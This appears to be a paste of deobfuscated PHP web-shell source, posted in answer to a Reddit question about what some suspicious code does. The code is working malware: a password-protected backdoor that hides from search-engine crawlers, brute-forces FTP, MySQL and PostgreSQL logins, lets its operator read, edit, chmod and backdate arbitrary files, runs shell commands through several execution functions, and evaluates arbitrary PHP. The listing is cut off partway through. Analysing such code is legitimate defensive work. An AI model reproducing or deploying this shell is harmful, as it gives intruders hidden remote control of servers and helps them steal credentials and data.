· 5 years ago · Sep 01, 2020, 04:20 PM
1<?php
2
3/**
4 * Decoded by request
5 *
6 * @link https://www.reddit.com/r/PHPhelp/comments/ikl0za/can_someone_help_decipher_what_this_code_is_doing/
7 */
8
9goto fd9e3;
10D38e6:
11$disable_functions = @ini_get('disable_functions');
12goto b58e2;
13B3a61:
14if (!empty($auth_pass)) {
15 if (isset($_POST['pass']) && md5($_POST['pass']) == $auth_pass) {
16 LoJWfsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
17 }
18 if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || $_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass) {
19 LoJWfLogin();
20 }
21}
22goto Bd6d6;
23C5790:
24function actionBruteforce()
25{
26 goto Ea7f5;
27 Ea7f5:
28 LoJWfHeader();
29 goto Fc05b;
30 E54b1:
31 LoJWfFooter();
32 goto b0abf;
33 c34ec:
34 echo '</div><br>';
35 goto E54b1;
36 Fc05b:
37 if (isset($_POST['proto'])) {
38 goto cc1aa;
39 B6b22:
40 echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>";
41 goto d2238;
42 Fd7d0:
43 $server = explode(":", $_POST['server']);
44 goto C3939;
45 cc1aa:
46 echo '<h1>Results</h1><div class=content><span>Type:</span> ' . htmlspecialchars($_POST['proto']) . ' <span>Server:</span> ' . htmlspecialchars($_POST['server']) . '<br>';
47 goto C2bd2;
48 fa037:
49 $attempts = 0;
50 goto Fd7d0;
51 C3939:
52 if ($_POST['type'] == 1) {
53 $temp = @file('/etc/passwd');
54 if (is_array($temp)) {
55 foreach ($temp as $line) {
56 goto e20a5;
57 cb74f:
58 ++$attempts;
59 goto F567c;
60 F567c:
61 if (LoJWfBruteForce(@$server[0], @$server[1], $line[0], $line[0])) {
62 $success++;
63 echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($line[0]) . '<br>';
64 }
65 goto B6d4b;
66 B6d4b:
67 if (@$_POST['reverse']) {
68 goto a1ded;
69 cdd09:
70 $i = strlen($line[0]) - 1;
71 goto ccc2a;
72 b9547:
73 ++$attempts;
74 goto e029e;
75 C9ab4:
76 goto c3b79;
77 goto Ade82;
78 C4a3f:
79 --$i;
80 goto C9ab4;
81 ccc2a:
82 c3b79:
83 goto Ec5ef;
84 Ff342:
85 E3f20:
86 goto C4a3f;
87 e5c3d:
88 $tmp .= $line[0][$i];
89 goto Ff342;
90 Ec5ef:
91 if (!($i >= 0)) {
92 goto d1e98;
93 }
94 goto e5c3d;
95 e029e:
96 if (LoJWfBruteForce(@$server[0], @$server[1], $line[0], $tmp)) {
97 $success++;
98 echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($tmp);
99 }
100 goto fafd0;
101 a1ded:
102 $tmp = "";
103 goto cdd09;
104 Ade82:
105 d1e98:
106 goto b9547;
107 fafd0:
108 }
109 goto E56c7;
110 e20a5:
111 $line = explode(":", $line);
112 goto cb74f;
113 E56c7:
114 a971f:
115 goto ba0cf;
116 ba0cf:
117 }
118 f3e76:
119 }
120 } elseif ($_POST['type'] == 2) {
121 $temp = @file($_POST['dict']);
122 if (is_array($temp)) {
123 foreach ($temp as $line) {
124 goto A6610;
125 A6c51:
126 ++$attempts;
127 goto A74ba;
128 B7227:
129 F5110:
130 goto ebbac;
131 A6610:
132 $line = trim($line);
133 goto A6c51;
134 A74ba:
135 if (LoJWfBruteForce($server[0], @$server[1], $_POST['login'], $line)) {
136 $success++;
137 echo '<b>' . htmlspecialchars($_POST['login']) . '</b>:' . htmlspecialchars($line) . '<br>';
138 }
139 goto B7227;
140 ebbac:
141 }
142 A4d4e:
143 }
144 }
145 goto B6b22;
146 d11c5:
147 $success = 0;
148 goto fa037;
149 C2bd2:
150 if ($_POST['proto'] == 'ftp') {
151 function LoJWfBruteForce($ip, $port, $login, $pass)
152 {
153 goto A412e;
154 f5a7a:
155 $res = @ftp_login($fp, $login, $pass);
156 goto a5286;
157 d4058:
158 return $res;
159 goto d9d9b;
160 A412e:
161 $fp = @ftp_connect($ip, $port ? $port : 21);
162 goto Add20;
163 a5286:
164 @ftp_close($fp);
165 goto d4058;
166 Add20:
167 if (!$fp) {
168 return false;
169 }
170 goto f5a7a;
171 d9d9b:
172 }
173 } elseif ($_POST['proto'] == 'mysql') {
174 function LoJWfBruteForce($ip, $port, $login, $pass)
175 {
176 goto A74c4;
177 c6a7c:
178 return $res;
179 goto D9e9c;
180 A74c4:
181 $res = @mysql_connect($ip . ':' . ($port ? $port : 3306), $login, $pass);
182 goto f8f74;
183 f8f74:
184 @mysql_close($res);
185 goto c6a7c;
186 D9e9c:
187 }
188 } elseif ($_POST['proto'] == 'pgsql') {
189 function LoJWfBruteForce($ip, $port, $login, $pass)
190 {
191 goto C110a;
192 c27f1:
193 @pg_close($res);
194 goto d85d0;
195 C110a:
196 $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres";
197 goto C0883;
198 d85d0:
199 return $res;
200 goto E358c;
201 C0883:
202 $res = @pg_connect($str);
203 goto c27f1;
204 E358c:
205 }
206 }
207 goto d11c5;
208 d2238:
209 }
210 goto D9b87;
211 D9b87:
212 echo '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' . '<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' . '<input type=hidden name=c value="' . htmlspecialchars($GLOBALS['cwd']) . '">' . '<input type=hidden name=a value="' . htmlspecialchars($_POST['a']) . '">' . '<input type=hidden name=charset value="' . htmlspecialchars($_POST['charset']) . '">' . '<span>Server:port</span></td>' . '<td><input type=text name=server value="127.0.0.1"></td></tr>' . '<tr><td><span>Brute type</span></td>' . '<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' . '<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' . '<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' . '<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' . '<td><input type=text name=login value="root"></td></tr>' . '<tr><td><span>Dictionary</span></td>' . '<td><input type=text name=dict value="' . htmlspecialchars($GLOBALS['cwd']) . 'passwd.dic"></td></tr></table>' . '</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
213 goto c34ec;
214 b0abf:
215}
216goto ff494;
217E0cac:
218if (!empty($_SERVER['HTTP_USER_AGENT'])) {
219 $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
220 if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
221 header('HTTP/1.0 404 Not Found');
222 exit;
223 }
224}
225goto B4ecb;
226D5033:
227function actionLogout()
228{
229 setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
230 die('bye!');
231}
232goto B43e1;
233B19c6:
234$color = "#df5";
235goto Bff43;
236fd9e3:
237error_reporting(0);
238goto a63d5;
239d7790:
240function actionFilesTools()
241{
242 goto ef553;
243 D885c:
244 foreach ($m as $v) {
245 echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\'' . strtolower($v) . '\')">' . (strtolower($v) == @$_POST['p2'] ? '<b>[ ' . $v . ' ]</b>' : $v) . '</a> ';
246 B7c9a:
247 }
248 goto e298f;
249 ef553:
250 if (isset($_POST['p1'])) {
251 $_POST['p1'] = urldecode($_POST['p1']);
252 }
253 goto d1fde;
254 bb227:
255 echo '</div>';
256 goto F482e;
257 ad003:
258 echo '<span>Change time:</span> ' . date('Y-m-d H:i:s', filectime($_POST['p1'])) . ' <span>Access time:</span> ' . date('Y-m-d H:i:s', fileatime($_POST['p1'])) . ' <span>Modify time:</span> ' . date('Y-m-d H:i:s', filemtime($_POST['p1'])) . '<br><br>';
259 goto C048d;
260 d1fde:
261 if (@$_POST['p2'] == 'download') {
262 if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
263 goto Ca21f;
264 D93a7:
265 if (function_exists("mime_content_type")) {
266 $type = @mime_content_type($_POST['p1']);
267 header("Content-Type: " . $type);
268 } else {
269 header("Content-Type: application/octet-stream");
270 }
271 goto c3f3e;
272 F7277:
273 if ($fp) {
274 goto ffc30;
275 f0d0c:
276 goto b6334;
277 goto Fe997;
278 ffc30:
279 b6334:
280 goto B42ad;
281 a2850:
282 echo @fread($fp, 1024);
283 goto f0d0c;
284 e5359:
285 fclose($fp);
286 goto Efd54;
287 B42ad:
288 if (@feof($fp)) {
289 goto E68dc;
290 }
291 goto a2850;
292 Fe997:
293 E68dc:
294 goto e5359;
295 Efd54:
296 }
297 goto Df946;
298 c3f3e:
299 $fp = @fopen($_POST['p1'], "r");
300 goto F7277;
301 bdd9f:
302 header("Content-Disposition: attachment; filename=" . basename($_POST['p1']));
303 goto D93a7;
304 Ca21f:
305 ob_start("ob_gzhandler", 4096);
306 goto bdd9f;
307 Df946:
308 }
309 exit;
310 }
311 goto A1557;
312 de9e7:
313 if (!file_exists(@$_POST['p1'])) {
314 goto Ecc5a;
315 C7033:
316 return;
317 goto E48c2;
318 Ecc5a:
319 echo 'File not exists';
320 goto Ec6cc;
321 Ec6cc:
322 LoJWfFooter();
323 goto C7033;
324 E48c2:
325 }
326 goto abf48;
327 D1561:
328 echo '<h1>File tools</h1><div class=content>';
329 goto de9e7;
330 C0159:
331 echo '<br><br>';
332 goto b129c;
333 b129c:
334 switch ($_POST['p2']) {
335 case 'view':
336 goto A2873;
337 Dfffc:
338 if ($fp) {
339 goto d6155;
340 Dd2cc:
341 @fclose($fp);
342 goto efa79;
343 D2d06:
344 e6716:
345 goto Dd2cc;
346 c9d40:
347 goto dd14b;
348 goto D2d06;
349 d6155:
350 dd14b:
351 goto Edb96;
352 f2d2a:
353 echo htmlspecialchars(@fread($fp, 1024));
354 goto c9d40;
355 Edb96:
356 if (@feof($fp)) {
357 goto e6716;
358 }
359 goto f2d2a;
360 efa79:
361 }
362 goto eead4;
363 eead4:
364 echo '</pre>';
365 goto e8aa6;
366 Ba63b:
367 $fp = @fopen($_POST['p1'], 'r');
368 goto Dfffc;
369 A2873:
370 echo '<pre class=ml1>';
371 goto Ba63b;
372 e8aa6:
373 goto E0395;
374 goto c27d9;
375 c27d9:
376 case 'highlight':
377 if (@is_readable($_POST['p1'])) {
378 goto C958f;
379 C958f:
380 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
381 goto bc1f8;
382 bc1f8:
383 $code = @highlight_file($_POST['p1'], true);
384 goto eefbf;
385 eefbf:
386 echo str_replace(array('<span ', '</span>'), array('<font ', '</font>'), $code) . '</div>';
387 goto b9d73;
388 b9d73:
389 }
390 goto E0395;
391 case 'chmod':
392 goto d50d9;
393 Cbb29:
394 echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="' . substr(sprintf('%o', fileperms($_POST['p1'])), -4) . '"><input type=submit value=">>"></form>';
395 goto f0ee0;
396 f0ee0:
397 goto E0395;
398 goto F09c5;
399 d50d9:
400 if (!empty($_POST['p3'])) {
401 goto d7536;
402 d7536:
403 $perms = 0;
404 goto C01d6;
405 F9493:
406 --$i;
407 goto Ce7b2;
408 afea8:
409 A5c1e:
410 goto fd193;
411 F0d04:
412 if (!@chmod($_POST['p1'], $perms)) {
413 echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
414 }
415 goto B8915;
416 d761d:
417 A2b6c:
418 goto F9493;
419 Ce7b2:
420 goto A5c1e;
421 goto Fb9ea;
422 fd193:
423 if (!($i >= 0)) {
424 goto dd482;
425 }
426 goto Fd0a1;
427 Fd0a1:
428 $perms += (int) $_POST['p3'][$i] * pow(8, strlen($_POST['p3']) - $i - 1);
429 goto d761d;
430 C01d6:
431 $i = strlen($_POST['p3']) - 1;
432 goto afea8;
433 Fb9ea:
434 dd482:
435 goto F0d04;
436 B8915:
437 }
438 goto d3c5c;
439 d3c5c:
440 clearstatcache();
441 goto Cbb29;
442 F09c5:
443 case 'edit':
444 goto f532e;
445 cbf7d:
446 echo '</textarea><input type=submit value=">>"></form>';
447 goto Ccb89;
448 Ccb89:
449 goto E0395;
450 goto e9617;
451 f532e:
452 if (!is_writable($_POST['p1'])) {
453 echo 'File isn\'t writeable';
454 goto E0395;
455 }
456 goto f9dee;
457 fce5d:
458 $fp = @fopen($_POST['p1'], 'r');
459 goto C8420;
460 C8420:
461 if ($fp) {
462 goto Cbc35;
463 C20e2:
464 C7307:
465 goto C6899;
466 A2d81:
467 echo htmlspecialchars(@fread($fp, 1024));
468 goto d00f0;
469 Cbc35:
470 Ecbfc:
471 goto e0441;
472 d00f0:
473 goto Ecbfc;
474 goto C20e2;
475 C6899:
476 @fclose($fp);
477 goto cde1c;
478 e0441:
479 if (@feof($fp)) {
480 goto C7307;
481 }
482 goto A2d81;
483 cde1c:
484 }
485 goto cbf7d;
486 B4744:
487 echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
488 goto fce5d;
489 f9dee:
490 if (!empty($_POST['p3'])) {
491 goto d5a6c;
492 B5d06:
493 $fp = @fopen($_POST['p1'], "w");
494 goto C78f1;
495 d5a6c:
496 $time = @filemtime($_POST['p1']);
497 goto f1081;
498 C78f1:
499 if ($fp) {
500 goto B664b;
501 E714b:
502 @touch($_POST['p1'], $time, $time);
503 goto dd4a5;
504 B664b:
505 @fwrite($fp, $_POST['p3']);
506 goto fb17a;
507 B77cb:
508 echo 'Saved!<br><script>p3_="";</script>';
509 goto E714b;
510 fb17a:
511 @fclose($fp);
512 goto B77cb;
513 dd4a5:
514 }
515 goto B12b8;
516 f1081:
517 $_POST['p3'] = substr($_POST['p3'], 1);
518 goto B5d06;
519 B12b8:
520 }
521 goto B4744;
522 e9617:
523 case 'hexdump':
524 goto ca596;
525 e6c52:
526 dc1df:
527 goto De349;
528 E9ee3:
529 goto E0395;
530 goto B9021;
531 Cad36:
532 $h = array('00000000<br>', '', '');
533 goto b2065;
534 addc8:
535 a4acd:
536 goto D9d3d;
537 ca596:
538 $c = @file_get_contents($_POST['p1']);
539 goto a2516;
540 bff2d:
541 $i = 0;
542 goto addc8;
543 B7783:
544 if ($n == 32) {
545 goto F6c2a;
546 Aa9db:
547 $h[1] .= '<br>';
548 goto e07ae;
549 F6c2a:
550 $n = 0;
551 goto Cd4fd;
552 e07ae:
553 $h[2] .= "\n";
554 goto cde83;
555 Cd4fd:
556 if ($i + 1 < $len) {
557 $h[0] .= sprintf('%08X', $i + 1) . '<br>';
558 }
559 goto Aa9db;
560 cde83:
561 }
562 goto A1fda;
563 f13e1:
564 ca473:
565 goto D0090;
566 fe4a3:
567 b00b5:
568 goto e6c52;
569 b2065:
570 $len = strlen($c);
571 goto bff2d;
572 D9d3d:
573 if (!($i < $len)) {
574 goto ca473;
575 }
576 goto B3e62;
577 D0090:
578 echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>' . $h[0] . '</pre></span></td><td bgcolor=#282828><pre>' . $h[1] . '</pre></td><td bgcolor=#333333><pre>' . htmlspecialchars($h[2]) . '</pre></td></tr></table>';
579 goto E9ee3;
580 bdcb2:
581 goto a4acd;
582 goto f13e1;
583 cd5c6:
584 ++$i;
585 goto bdcb2;
586 bd1a5:
587 switch (ord($c[$i])) {
588 case 0:
589 $h[2] .= ' ';
590 goto dc1df;
591 case 9:
592 $h[2] .= ' ';
593 goto dc1df;
594 case 10:
595 $h[2] .= ' ';
596 goto dc1df;
597 case 13:
598 $h[2] .= ' ';
599 goto dc1df;
600 default:
601 $h[2] .= $c[$i];
602 goto dc1df;
603 }
604 goto fe4a3;
605 B3e62:
606 $h[1] .= sprintf('%02X', ord($c[$i])) . ' ';
607 goto bd1a5;
608 De349:
609 $n++;
610 goto B7783;
611 A1fda:
612 df950:
613 goto cd5c6;
614 a2516:
615 $n = 0;
616 goto Cad36;
617 B9021:
618 case 'rename':
619 goto fcb88;
620 fcb88:
621 if (!empty($_POST['p3'])) {
622 if (!@rename($_POST['p1'], $_POST['p3'])) {
623 echo 'Can\'t rename!<br>';
624 } else {
625 die('<script>g(null,null,"' . urlencode($_POST['p3']) . '",null,"")</script>');
626 }
627 }
628 goto d6faa;
629 d6faa:
630 echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="' . htmlspecialchars($_POST['p1']) . '"><input type=submit value=">>"></form>';
631 goto faea1;
632 faea1:
633 goto E0395;
634 goto A8d69;
635 A8d69:
636 case 'touch':
637 goto f29c8;
638 E4273:
639 echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="' . date("Y-m-d H:i:s", @filemtime($_POST['p1'])) . '"><input type=submit value=">>"></form>';
640 goto Abf57;
641 c07c0:
642 clearstatcache();
643 goto E4273;
644 f29c8:
645 if (!empty($_POST['p3'])) {
646 $time = strtotime($_POST['p3']);
647 if ($time) {
648 if (!touch($_POST['p1'], $time, $time)) {
649 echo 'Fail!';
650 } else {
651 echo 'Touched!';
652 }
653 } else {
654 echo 'Bad time format!';
655 }
656 }
657 goto c07c0;
658 Abf57:
659 goto E0395;
660 goto b22a2;
661 b22a2:
662 }
663 goto A01be;
664 F482e:
665 LoJWfFooter();
666 goto C9f1e;
667 C048d:
668 if (empty($_POST['p2'])) {
669 $_POST['p2'] = 'view';
670 }
671 goto Bf386;
672 df323:
673 LoJWfHeader();
674 goto D1561;
675 e298f:
676 E7161:
677 goto C0159;
678 abf48:
679 $uid = @posix_getpwuid(@fileowner($_POST['p1']));
680 goto bcac9;
681 bcac9:
682 if (!$uid) {
683 $uid['name'] = @fileowner($_POST['p1']);
684 $gid['name'] = @filegroup($_POST['p1']);
685 } else {
686 $gid = @posix_getgrgid(@filegroup($_POST['p1']));
687 }
688 goto bc1f6;
689 Bf386:
690 if (is_file($_POST['p1'])) {
691 $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
692 } else {
693 $m = array('Chmod', 'Rename', 'Touch');
694 }
695 goto D885c;
696 bc1f6:
697 echo '<span>Name:</span> ' . htmlspecialchars(@basename($_POST['p1'])) . ' <span>Size:</span> ' . (is_file($_POST['p1']) ? LoJWfViewSize(filesize($_POST['p1'])) : '-') . ' <span>Permission:</span> ' . LoJWfPermsColor($_POST['p1']) . ' <span>Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . '<br>';
698 goto ad003;
699 D9621:
700 E0395:
701 goto bb227;
702 A01be:
703 bcfdc:
704 goto D9621;
705 A1557:
706 if (@$_POST['p2'] == 'mkfile') {
707 if (!file_exists($_POST['p1'])) {
708 $fp = @fopen($_POST['p1'], 'w');
709 if ($fp) {
710 $_POST['p2'] = "edit";
711 fclose($fp);
712 }
713 }
714 }
715 goto df323;
716 C9f1e:
717}
718goto dac4a;
719Bff43:
720$default_action = 'FilesMan';
721goto c08c9;
722c08c9:
723$default_use_ajax = true;
724goto a8329;
725b58e2:
726$home_cwd = @getcwd();
727goto B06f2;
728A1657:
729$safe_mode = @ini_get('safe_mode');
730goto fb74c;
731Bd6d6:
732if (strtolower(substr(PHP_OS, 0, 3)) == "win") {
733 $os = 'win';
734} else {
735 $os = 'nix';
736}
737goto A1657;
738ccf1f:
739function LoJWfEx($in)
740{
741 goto Df316;
742 Df316:
743 $out = '';
744 goto a0b12;
745 b1e98:
746 return $out;
747 goto D6625;
748 a0b12:
749 if (function_exists('exec')) {
750 @exec($in, $out);
751 $out = @join("\n", $out);
752 } elseif (function_exists('passthru')) {
753 goto e1958;
754 d92f2:
755 $out = ob_get_clean();
756 goto e1cc1;
757 F1a19:
758 @passthru($in);
759 goto d92f2;
760 e1958:
761 ob_start();
762 goto F1a19;
763 e1cc1:
764 } elseif (function_exists('system')) {
765 goto e36fd;
766 E3577:
767 $out = ob_get_clean();
768 goto fe52c;
769 Af864:
770 @system($in);
771 goto E3577;
772 e36fd:
773 ob_start();
774 goto Af864;
775 fe52c:
776 } elseif (function_exists('shell_exec')) {
777 $out = shell_exec($in);
778 } elseif (is_resource($f = @popen($in, "r"))) {
779 goto a95c1;
780 ac7f3:
781 C3a45:
782 goto C5800;
783 c3af2:
784 $out .= fread($f, 1024);
785 goto Ec8f9;
786 cac1d:
787 b4c74:
788 goto F5cac;
789 C5800:
790 pclose($f);
791 goto cefb8;
792 Ec8f9:
793 goto b4c74;
794 goto ac7f3;
795 a95c1:
796 $out = "";
797 goto cac1d;
798 F5cac:
799 if (@feof($f)) {
800 goto C3a45;
801 }
802 goto c3af2;
803 cefb8:
804 }
805 goto b1e98;
806 D6625:
807}
808goto E34b2;
809E34b2:
810function LoJWfViewSize($s)
811{
812 if (is_int($s)) {
813 $s = sprintf("%u", $s);
814 }
815 if ($s >= 1073741824) {
816 return sprintf('%1.2f', $s / 1073741824) . ' GB';
817 } elseif ($s >= 1048576) {
818 return sprintf('%1.2f', $s / 1048576) . ' MB';
819 } elseif ($s >= 1024) {
820 return sprintf('%1.2f', $s / 1024) . ' KB';
821 } else {
822 return $s . ' B';
823 }
824}
825goto f0d26;
826a83b4:
827function LoJWfScandir($dir)
828{
829 if (function_exists("scandir")) {
830 return scandir($dir);
831 } else {
832 goto Fc0b8;
833 fba8f:
834 fc1b8:
835 goto A3179;
836 d8ba5:
837 if (!(false !== ($filename = readdir($dh)))) {
838 goto fc1b8;
839 }
840 goto C9b58;
841 C9b58:
842 $files[] = $filename;
843 goto Ea4e3;
844 Fc0b8:
845 $dh = opendir($dir);
846 goto F43da;
847 Ea4e3:
848 goto C1fa5;
849 goto fba8f;
850 A3179:
851 return $files;
852 goto D9463;
853 F43da:
854 C1fa5:
855 goto d8ba5;
856 D9463:
857 }
858}
859goto f483e;
860e8346:
861if (empty($_POST['a'])) {
862 if (isset($default_action) && function_exists('action' . $default_action)) {
863 $_POST['a'] = $default_action;
864 } else {
865 $_POST['a'] = 'SecInfo';
866 }
867}
868goto aee81;
869E15e8:
870if ($os == 'win') {
871 $home_cwd = str_replace("\\", "/", $home_cwd);
872 $cwd = str_replace("\\", "/", $cwd);
873}
874goto b7b56;
875B06f2:
876if (isset($_POST['c'])) {
877 @chdir($_POST['c']);
878}
879goto c80a8;
880f483e:
881function LoJWfWhich($p)
882{
883 goto b9550;
884 b9550:
885 $path = LoJWfEx('which ' . $p);
886 goto fa087;
887 fa087:
888 if (!empty($path)) {
889 return $path;
890 }
891 goto fd956;
892 fd956:
893 return false;
894 goto b4f10;
895 b4f10:
896}
897goto dd196;
898beac0:
899if (!function_exists("posix_getgrgid") && strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false) {
900 function posix_getgrgid($p)
901 {
902 return false;
903 }
904}
905goto ccf1f;
906d9378:
907function LoJWfLogin()
908{
909 die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
910}
911goto Adf01;
912dac4a:
913function actionConsole()
914{
915 goto f314a;
916 b2dc7:
917 foreach ($GLOBALS['aliases'] as $n => $v) {
918 goto C7877;
919 C7877:
920 if ($v == '') {
921 echo '<optgroup label="-' . htmlspecialchars($n) . '-"></optgroup>';
922 goto d9112;
923 }
924 goto D59d6;
925 C4592:
926 d9112:
927 goto a6492;
928 D59d6:
929 echo '<option value="' . htmlspecialchars($v) . '">' . $n . '</option>';
930 goto C4592;
931 a6492:
932 }
933 goto E4c03;
934 b9fec:
935 if (isset($_POST['ajax'])) {
936 goto b26dd;
937 f4287:
938 echo "d.cf.cmd.value='';\n";
939 goto bd8d6;
940 ee017:
941 echo strlen($temp), "\n", $temp;
942 goto A5032;
943 D4444:
944 echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
945 goto D5a5a;
946 f5fa2:
947 echo "d.cf.output.value+='" . $temp . "';";
948 goto D4444;
949 Abb64:
950 if (preg_match("!.*cd\\s+([^;]+)\$!", $_POST['p1'], $match)) {
951 if (@chdir($match[1])) {
952 $GLOBALS['cwd'] = @getcwd();
953 echo "c_='" . $GLOBALS['cwd'] . "';";
954 }
955 }
956 goto f5fa2;
957 Fd557:
958 ob_start();
959 goto f4287;
960 bd8d6:
961 $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n\$ " . $_POST['p1'] . "\n" . LoJWfEx($_POST['p1']), "\n\r\t\\'\0"));
962 goto Abb64;
963 b26dd:
964 LoJWfsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
965 goto Fd557;
966 D5a5a:
967 $temp = ob_get_clean();
968 goto ee017;
969 A5032:
970 exit;
971 goto C5ce8;
972 C5ce8:
973 }
974 goto F7abb;
975 F7abb:
976 if (empty($_POST['ajax']) && !empty($_POST['p1'])) {
977 LoJWfsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
978 }
979 goto eb9fe;
980 Ce6da:
981 echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
982 goto b2dc7;
983 eb583:
984 echo "<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\nvar cmds = new Array('');\r\nvar cur = 0;\r\nfunction kp(e) {\r\n\tvar n = (window.Event) ? e.which : e.keyCode;\r\n\tif(n == 38) {\r\n\t\tcur--;\r\n\t\tif(cur>=0)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur++;\r\n\t} else if(n == 40) {\r\n\t\tcur++;\r\n\t\tif(cur < cmds.length)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur--;\r\n\t}\r\n}\r\nfunction add(cmd) {\r\n\tcmds.pop();\r\n\tcmds.push(cmd);\r\n\tcmds.push('');\r\n\tcur = cmds.length-1;\r\n}\r\n</script>";
985 goto Ce6da;
986 eb9fe:
987 LoJWfHeader();
988 goto eb583;
989 af464:
990 if (!empty($_POST['p1'])) {
991 echo htmlspecialchars("\$ " . $_POST['p1'] . "\n" . LoJWfEx($_POST['p1']));
992 }
993 goto d0c43;
994 E4c03:
995 De512:
996 goto Db445;
997 Db445:
998 echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 ' . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX <input type=checkbox name=show_errors value=1 ' . (!empty($_POST['p2']) || $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'stderr_to_out'] ? 'checked' : '') . '> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
999 goto af464;
1000 C81ef:
1001 echo '</form></div><script>d.cf.cmd.focus();</script>';
1002 goto Cc0b7;
1003 Cc0b7:
1004 LoJWfFooter();
1005 goto dfeed;
1006 f314a:
1007 if (!empty($_POST['p1']) && !empty($_POST['p2'])) {
1008 LoJWfsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', true);
1009 $_POST['p1'] .= ' 2>&1';
1010 } elseif (!empty($_POST['p1'])) {
1011 LoJWfsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', 0);
1012 }
1013 goto b9fec;
1014 d0c43:
1015 echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
1016 goto C81ef;
1017 dfeed:
1018}
1019goto D5033;
1020fe83f:
1021function actionPhp()
1022{
1023 goto d2d9b;
1024 C3e44:
1025 if (!empty($_POST['p1'])) {
1026 goto E64d0;
1027 E64d0:
1028 ob_start();
1029 goto Afd78;
1030 D83dc:
1031 echo htmlspecialchars(ob_get_clean());
1032 goto ec2c5;
1033 Afd78:
1034 eval($_POST['p1']);
1035 goto D83dc;
1036 ec2c5:
1037 }
1038 goto c0306;
1039 B1c9c:
1040 LoJWfFooter();
1041 goto A8625;
1042 be918:
1043 echo ' <input type=checkbox name=ajax value=1 ' . ($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX</form><pre id=PhpOutput style="' . (empty($_POST['p1']) ? 'display:none;' : '') . 'margin-top:5px;" class=ml1>';
1044 goto C3e44;
1045 cb220:
1046 if (empty($_POST['ajax']) && !empty($_POST['p1'])) {
1047 LoJWfsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
1048 }
1049 goto aa455;
1050 c5d86:
1051 if (isset($_POST['p2']) && $_POST['p2'] == 'info') {
1052 goto de7dc;
1053 E7216:
1054 ob_start();
1055 goto C43ba;
1056 a3349:
1057 echo str_replace('<h1', '<h2', $tmp) . '</div><br>';
1058 goto E61e4;
1059 de7dc:
1060 echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
1061 goto E7216;
1062 C43ba:
1063 phpinfo();
1064 goto Fbb76;
1065 Fbb76:
